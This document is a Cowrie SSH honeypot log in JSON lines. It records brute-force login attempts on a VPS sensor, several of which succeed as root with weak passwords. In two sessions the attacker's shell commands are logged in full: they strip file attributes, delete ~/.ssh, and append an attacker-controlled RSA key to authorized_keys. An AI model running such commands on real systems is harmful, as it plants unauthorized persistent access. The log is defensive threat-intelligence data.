{"eventid":"cowrie.session.closed","duration":12.308405637741089,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:30:55.697986Z","src_ip":"106.104.134.221","session":"ab2e8c75935e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47561,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bba802edbb3","protocol":"ssh","message":"New connection: 212.227.235.229:47561 (1.2.3.4:22) [session: 5bba802edbb3]","sensor":"my-vps","timestamp":"2025-09-09T06:30:58.206785Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:30:58.261451Z","src_ip":"212.227.235.229","session":"5bba802edbb3"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:30:58.611614Z","src_ip":"212.227.235.229","session":"5bba802edbb3"}
{"eventid":"cowrie.login.failed","username":"tester","password":"123456789","message":"login attempt [tester/123456789] failed","sensor":"my-vps","timestamp":"2025-09-09T06:31:00.051302Z","src_ip":"212.227.235.229","session":"5bba802edbb3"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:31:01.449497Z","src_ip":"212.227.235.229","session":"5bba802edbb3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52715,"dst_ip":"1.2.3.4","dst_port":22,"session":"ef8430c283c5","protocol":"ssh","message":"New connection: 212.227.235.229:52715 (1.2.3.4:22) [session: ef8430c283c5]","sensor":"my-vps","timestamp":"2025-09-09T06:31:12.834249Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:31:12.836854Z","src_ip":"212.227.235.229","session":"ef8430c283c5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:31:12.956706Z","src_ip":"212.227.235.229","session":"ef8430c283c5"}
{"eventid":"cowrie.login.success","username":"root","password":"qwer#1234","message":"login attempt [root/qwer#1234] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:31:13.524662Z","src_ip":"212.227.235.229","session":"ef8430c283c5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:31:13.770194Z","src_ip":"212.227.235.229","session":"ef8430c283c5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:31:13.770854Z","src_ip":"212.227.235.229","session":"ef8430c283c5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:31:13.771656Z","src_ip":"212.227.235.229","session":"ef8430c283c5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:31:13.926968Z","src_ip":"212.227.235.229","session":"ef8430c283c5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:31:14.278785Z","src_ip":"212.227.235.229","session":"ef8430c283c5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:31:14.279670Z","src_ip":"212.227.235.229","session":"ef8430c283c5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:31:14.391459Z","src_ip":"212.227.235.229","session":"ef8430c283c5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:31:14.392289Z","src_ip":"212.227.235.229","session":"ef8430c283c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52778,"dst_ip":"1.2.3.4","dst_port":22,"session":"916a224eb550","protocol":"ssh","message":"New connection: 212.227.235.229:52778 (1.2.3.4:22) [session: 916a224eb550]","sensor":"my-vps","timestamp":"2025-09-09T06:31:14.501502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:31:14.502455Z","src_ip":"212.227.235.229","session":"916a224eb550"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:31:14.612998Z","src_ip":"212.227.235.229","session":"916a224eb550"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:31:15.093641Z","src_ip":"212.227.235.229","session":"916a224eb550"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:31:16.205034Z","src_ip":"212.227.235.229","session":"916a224eb550"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56621,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a3b34580f59","protocol":"ssh","message":"New connection: 212.227.235.229:56621 (1.2.3.4:22) [session: 6a3b34580f59]","sensor":"my-vps","timestamp":"2025-09-09T06:31:16.315891Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:31:16.316749Z","src_ip":"212.227.235.229","session":"6a3b34580f59"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:31:16.428077Z","src_ip":"212.227.235.229","session":"6a3b34580f59"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:31:16.916037Z","src_ip":"212.227.235.229","session":"6a3b34580f59"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:31:17.026297Z","src_ip":"212.227.235.229","session":"ef8430c283c5"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:31:17.028468Z","src_ip":"212.227.235.229","session":"6a3b34580f59"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51423,"dst_ip":"1.2.3.4","dst_port":22,"session":"18efc63e4bef","protocol":"ssh","message":"New connection: 212.227.235.229:51423 (1.2.3.4:22) [session: 18efc63e4bef]","sensor":"my-vps","timestamp":"2025-09-09T06:31:19.346064Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:31:19.346963Z","src_ip":"212.227.235.229","session":"18efc63e4bef"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:31:19.698276Z","src_ip":"212.227.235.229","session":"18efc63e4bef"}
{"eventid":"cowrie.login.success","username":"root","password":"qqqitx","message":"login attempt [root/qqqitx] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:31:21.238996Z","src_ip":"212.227.235.229","session":"18efc63e4bef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:31:22.097082Z","src_ip":"212.227.235.229","session":"18efc63e4bef"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:31:22.098022Z","src_ip":"212.227.235.229","session":"18efc63e4bef"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:31:22.099694Z","src_ip":"212.227.235.229","session":"18efc63e4bef"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:31:22.832145Z","src_ip":"212.227.235.229","session":"18efc63e4bef"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:31:23.206292Z","src_ip":"212.227.235.229","session":"18efc63e4bef"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:31:23.206962Z","src_ip":"212.227.235.229","session":"18efc63e4bef"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:31:23.578654Z","src_ip":"212.227.235.229","session":"18efc63e4bef"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:31:23.579543Z","src_ip":"212.227.235.229","session":"18efc63e4bef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52349,"dst_ip":"1.2.3.4","dst_port":22,"session":"f803e759ae95","protocol":"ssh","message":"New connection: 212.227.235.229:52349 (1.2.3.4:22) [session: f803e759ae95]","sensor":"my-vps","timestamp":"2025-09-09T06:31:23.940016Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:31:23.940721Z","src_ip":"212.227.235.229","session":"f803e759ae95"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:31:24.295717Z","src_ip":"212.227.235.229","session":"f803e759ae95"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:31:25.736032Z","src_ip":"212.227.235.229","session":"f803e759ae95"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:31:27.098532Z","src_ip":"212.227.235.229","session":"f803e759ae95"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53051,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a3213bdecb0","protocol":"ssh","message":"New connection: 212.227.235.229:53051 (1.2.3.4:22) [session: 5a3213bdecb0]","sensor":"my-vps","timestamp":"2025-09-09T06:31:27.454899Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T06:31:27.455733Z","src_ip":"212.227.235.229","session":"5a3213bdecb0"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T06:31:27.802965Z","src_ip":"212.227.235.229","session":"5a3213bdecb0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:31:29.218098Z","src_ip":"212.227.235.229","session":"5a3213bdecb0"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:31:29.585642Z","src_ip":"212.227.235.229","session":"5a3213bdecb0"}
{"eventid":"cowrie.session.closed","duration":"10.2","message":"Connection lost after 10.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:31:29.588391Z","src_ip":"212.227.235.229","session":"18efc63e4bef"}
